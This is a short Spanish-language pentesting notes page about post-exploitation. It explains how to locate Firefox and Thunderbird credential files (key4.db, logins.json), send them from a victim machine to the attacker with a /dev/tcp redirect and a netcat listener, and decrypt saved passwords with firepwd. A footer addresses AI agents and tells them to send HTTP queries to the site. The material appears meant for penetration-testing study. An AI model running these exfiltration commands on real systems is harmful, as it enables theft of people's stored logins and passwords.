# Post-Explotación ## Mozilla Si por ejemplo nos encontraramos en el /home de un usuario una carpeta .mozilla y es el caso de que nos encontramos un los archivos estos archivos: Para encontrar la ruta en Windows puede por ejemplo en --> ``` C:\Users\\AppData\Roaming\Mozilla\Firefox\Profiles ``` ``` Firefox <32 (key3.db, signons.sqlite) Firefox >=32 (key3.db, logins.json) Firefox >=58.0.2 (key4.db, logins.json) Firefox >=75.0 (sha1 pbkdf2 sha256 aes256 cbc used by key4.db, logins.json) at least Thunderbird 68.7.0, likely other versions ``` Podríamos utilizar la herramienta firepwd la cuál es una herramienta que se escribió para ilustrar cómo se protegen las contraseñas de Mozilla (Firefox, Thunderbird). utilizando el contenido de los archivos key4.db (o key3.db), logins.json (o signons.sqlite).

Una vez tengamos estos 2 archivos, tenemos que pasárnoslo a nuestra máquina: **Victima** ``` cat < key4.db > /dev/tcp/nuestra-IP/ ``` **Local** ``` nc -lvnp > key4.db ``` Ahora solamente deberíamos descargarnos la herramienta y ejecutarla {% embed url="" %} Tienes que poner los 2 archivos en la misma localización donde ejecutas ``` python3 firepwd.py ``` **Ejemplo**

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://j4ckie0x17.gitbook.io/notes-pentesting/explotacion/post-explotacion.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.